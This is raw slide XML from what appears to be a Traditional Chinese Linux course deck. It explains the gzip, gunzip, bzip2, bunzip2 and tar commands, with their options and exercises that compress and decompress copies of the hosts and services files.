            <a:endParaRPr lang="zh-TW" altLang="en-US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gunzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：顯示檔案的壓縮比例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/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解壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" err="1"/>
              <a:t>gunzip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87320" y="1581120"/>
              <a:ext cx="1321200" cy="450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1480" y="1517760"/>
                <a:ext cx="13528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984240" y="2165400"/>
              <a:ext cx="198792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68400" y="2101680"/>
                <a:ext cx="20196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917880" y="2679840"/>
              <a:ext cx="123228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902040" y="2616120"/>
                <a:ext cx="1263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905600" y="2616120"/>
              <a:ext cx="17820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889760" y="2552760"/>
                <a:ext cx="2098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927000" y="3092400"/>
              <a:ext cx="825840" cy="576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11160" y="3029040"/>
                <a:ext cx="857520" cy="18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455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600" dirty="0" smtClean="0"/>
              <a:t>bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>壓縮及解壓縮檔案，無選項參數時執行壓縮操作，壓縮產生後附檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>.bz2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>壓縮檔案，並刪除源檔案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：解壓縮檔案，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>相當於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>bunzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>：顯示檔案的壓縮比例</a:t>
            </a:r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bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>壓縮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3543120" y="647640"/>
              <a:ext cx="1842120" cy="3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527280" y="584280"/>
                <a:ext cx="1873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971640" y="1530360"/>
              <a:ext cx="895680" cy="259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55800" y="1467000"/>
                <a:ext cx="9273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000160" y="1593720"/>
              <a:ext cx="176580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84320" y="1530360"/>
                <a:ext cx="179748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680000" y="1612800"/>
              <a:ext cx="1505160" cy="640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64160" y="1549440"/>
                <a:ext cx="15368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977760" y="4444920"/>
              <a:ext cx="2921400" cy="129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61920" y="4381560"/>
                <a:ext cx="29530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41520" y="2705040"/>
              <a:ext cx="2057760" cy="194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25320" y="2641680"/>
                <a:ext cx="208980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2146320" y="3352680"/>
              <a:ext cx="1143360" cy="19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130480" y="3289320"/>
                <a:ext cx="11750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248000" y="3238560"/>
              <a:ext cx="1600560" cy="44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232160" y="3174840"/>
                <a:ext cx="16326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6426360" y="3282840"/>
              <a:ext cx="616320" cy="194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410160" y="3219480"/>
                <a:ext cx="648360" cy="14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99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smtClean="0"/>
              <a:t>bunzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>用於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的逆操作，執行解壓縮，並將壓縮後的檔案還原到原始檔案，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令也可完成解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bunzip2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/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zip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>壓縮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12880" y="1587600"/>
              <a:ext cx="1562400" cy="1209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97040" y="1523880"/>
                <a:ext cx="159408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968480" y="2133720"/>
              <a:ext cx="191160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52640" y="2070000"/>
                <a:ext cx="19432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784680" y="2628720"/>
              <a:ext cx="2311560" cy="108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68840" y="2565360"/>
                <a:ext cx="2343240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390680" y="3174840"/>
              <a:ext cx="113688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374840" y="3111480"/>
                <a:ext cx="116856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598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’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/’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>’hosts’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案複製到根</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄下並</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>壓縮後，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>觀察壓縮後的壓縮檔案大小。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>再將壓縮過後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案使用進行解壓縮</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip&amp;gunzip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-57240" y="0"/>
              <a:ext cx="2946960" cy="21657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73080" y="-63360"/>
                <a:ext cx="2978640" cy="229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9034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’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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>”services”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案複製到根目錄下，並使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>壓縮後，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>觀察壓縮後的壓縮檔案大小。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>再將壓縮過後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>’services’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bunzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>解壓縮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作 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bzip&amp;bunzip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08000" y="235080"/>
              <a:ext cx="1638720" cy="22608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2160" y="171360"/>
                <a:ext cx="1670400" cy="2387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275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/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令位於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>/bin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>它能將使用者所指定的檔案或目錄打包成一個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>不過它並不做壓縮。一般 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>上常用的壓縮方式是先用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令將許多檔案打包成一個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>再以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>等壓縮指令壓縮成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>xxx.tar.gz (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>或稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>xxx.tgz ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的檔案。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打包的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令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44560" y="1574640"/>
              <a:ext cx="489240" cy="133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8720" y="1511280"/>
                <a:ext cx="5209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063880" y="1657440"/>
              <a:ext cx="313092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48040" y="1593720"/>
                <a:ext cx="31626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822840" y="3695760"/>
              <a:ext cx="857520" cy="446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07000" y="3632040"/>
                <a:ext cx="8892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736720" y="3098880"/>
              <a:ext cx="1435680" cy="1400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20880" y="3035160"/>
                <a:ext cx="146736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200560" y="3181320"/>
              <a:ext cx="20376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184720" y="3117960"/>
                <a:ext cx="2354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635880" y="3187800"/>
              <a:ext cx="1752840" cy="133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620040" y="3124080"/>
                <a:ext cx="1784520" cy="26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685800" y="3676680"/>
              <a:ext cx="1632240" cy="446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69960" y="3613320"/>
                <a:ext cx="1663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114640" y="3632040"/>
              <a:ext cx="1879920" cy="324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098800" y="3568680"/>
                <a:ext cx="19116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7416720" y="3708360"/>
              <a:ext cx="724320" cy="259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400880" y="3645000"/>
                <a:ext cx="7560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990720" y="4191120"/>
              <a:ext cx="1517760" cy="511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74880" y="4127400"/>
                <a:ext cx="1549440" cy="17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6336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2600" dirty="0" smtClean="0"/>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>指令能夠將檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>目錄打包成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>一個檔案，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>但不做壓縮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r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>tar [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>[-f] [filename]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>常用參數</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>-c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>：創建一個新的打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>備份檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>過程的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>訊息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>：指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>檔案名稱來打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>歸檔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>-z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>：用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>來壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>解壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>備份檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>-j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>：用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>解壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>備份檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>：解開</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>-C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>這個選項用在解壓縮，若要在特定目錄解壓縮，可以使用這個選項。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打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>-tar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-888840" y="95400"/>
              <a:ext cx="2070360" cy="26924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905040" y="31680"/>
                <a:ext cx="2102400" cy="281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044800" y="4781520"/>
              <a:ext cx="4051440" cy="766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28960" y="4718160"/>
                <a:ext cx="408312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955880" y="5232240"/>
              <a:ext cx="4007160" cy="1530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40040" y="5168880"/>
                <a:ext cx="4038840" cy="27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270080" y="4762440"/>
              <a:ext cx="27324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54240" y="4699080"/>
                <a:ext cx="3049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359000" y="5245200"/>
              <a:ext cx="178200" cy="255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43160" y="5181480"/>
                <a:ext cx="20988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263600" y="5759280"/>
              <a:ext cx="40680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47760" y="5695920"/>
                <a:ext cx="4384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2013120" y="5708520"/>
              <a:ext cx="1302120" cy="133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996920" y="5645160"/>
                <a:ext cx="13341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432160" y="2438280"/>
              <a:ext cx="565560" cy="194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416320" y="2374920"/>
                <a:ext cx="5972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025720" y="4280040"/>
              <a:ext cx="2972160" cy="702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09880" y="4216320"/>
                <a:ext cx="300384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816360" y="2413080"/>
              <a:ext cx="1575000" cy="255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800520" y="2349360"/>
                <a:ext cx="16070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108320" y="4616280"/>
